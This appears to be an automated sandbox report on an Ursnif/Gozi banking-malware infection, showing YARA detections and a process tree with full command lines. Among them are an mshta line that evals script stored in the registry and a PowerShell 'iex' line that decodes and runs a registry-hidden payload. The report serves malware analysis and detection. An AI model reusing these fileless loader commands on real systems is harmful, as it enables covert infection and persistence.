                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Analysis Process: cmd.exe PID: 6456 Parent PID: 6432

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:26:02
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
                                                                                                                                                                                                    Imagebase:0x150000
                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Analysis Process: iexplore.exe PID: 6488 Parent PID: 6456

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:26:03
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    Imagebase:0x7ff6f6b80000
                                                                                                                                                                                                    File size:823560 bytes
                                                                                                                                                                                                    MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Analysis Process: iexplore.exe PID: 6532 Parent PID: 6488

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:26:04
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17410 /prefetch:2
                                                                                                                                                                                                    Imagebase:0x820000
                                                                                                                                                                                                    File size:822536 bytes
                                                                                                                                                                                                    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Analysis Process: iexplore.exe PID: 6968 Parent PID: 6488

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:26:42
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:82962 /prefetch:2
                                                                                                                                                                                                    Imagebase:0x820000
                                                                                                                                                                                                    File size:822536 bytes
                                                                                                                                                                                                    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Analysis Process: iexplore.exe PID: 1276 Parent PID: 6488

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:26:45
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17422 /prefetch:2
                                                                                                                                                                                                    Imagebase:0x820000
                                                                                                                                                                                                    File size:822536 bytes
                                                                                                                                                                                                    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Analysis Process: iexplore.exe PID: 1752 Parent PID: 6488

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:26:49
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17430 /prefetch:2
                                                                                                                                                                                                    Imagebase:0x820000
                                                                                                                                                                                                    File size:822536 bytes
                                                                                                                                                                                                    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Analysis Process: mshta.exe PID: 4676 Parent PID: 3472

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:26:56
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
                                                                                                                                                                                                    Imagebase:0x7ff667ba0000
                                                                                                                                                                                                    File size:14848 bytes
                                                                                                                                                                                                    MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                                    Analysis Process: powershell.exe PID: 5140 Parent PID: 4676

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:26:58
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
                                                                                                                                                                                                    Imagebase:0x7ff7a7ef0000
                                                                                                                                                                                                    File size:447488 bytes
                                                                                                                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: GoziRule, Description: Win32.Gozi, Source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, Author: CCN-CERT
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Analysis Process: conhost.exe PID: 5148 Parent PID: 5140

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:26:59
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff7ecfc0000
                                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Analysis Process: csc.exe PID: 5724 Parent PID: 5140

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:27:07
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
                                                                                                                                                                                                    Imagebase:0x7ff7e9cb0000
                                                                                                                                                                                                    File size:2739304 bytes
                                                                                                                                                                                                    MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                                    Analysis Process: cvtres.exe PID: 1268 Parent PID: 5724

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:27:09
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
                                                                                                                                                                                                    Imagebase:0x7ff7a8450000
                                                                                                                                                                                                    File size:47280 bytes
                                                                                                                                                                                                    MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                                    Analysis Process: csc.exe PID: 6968 Parent PID: 5140

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:27:13
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
                                                                                                                                                                                                    Imagebase:0x7ff7e9cb0000
                                                                                                                                                                                                    File size:2739304 bytes
                                                                                                                                                                                                    MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:.Net C# or VB.NET

                                                                                                                                                                                                    Analysis Process: cvtres.exe PID: 4192 Parent PID: 6968

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:27:14
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
                                                                                                                                                                                                    Imagebase:0x7ff7a8450000
                                                                                                                                                                                                    File size:47280 bytes
                                                                                                                                                                                                    MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                    Analysis Process: control.exe PID: 6768 Parent PID: 6448

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:27:17
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Windows\System32\control.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\control.exe -h
                                                                                                                                                                                                    Imagebase:0x7ff667820000
                                                                                                                                                                                                    File size:117760 bytes
                                                                                                                                                                                                    MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                    Analysis Process: rundll32.exe PID: 5052 Parent PID: 6768

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:27:21
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                                                                                                                                                                    Imagebase:0x7ff647450000
                                                                                                                                                                                                    File size:69632 bytes
                                                                                                                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                    Analysis Process: explorer.exe PID: 3472 Parent PID: 5140

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:27:23
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                    Imagebase:0x7ff693d90000
                                                                                                                                                                                                    File size:3933184 bytes
                                                                                                                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                    Code Analysis

                                                                                                                                                                                                    Reset < >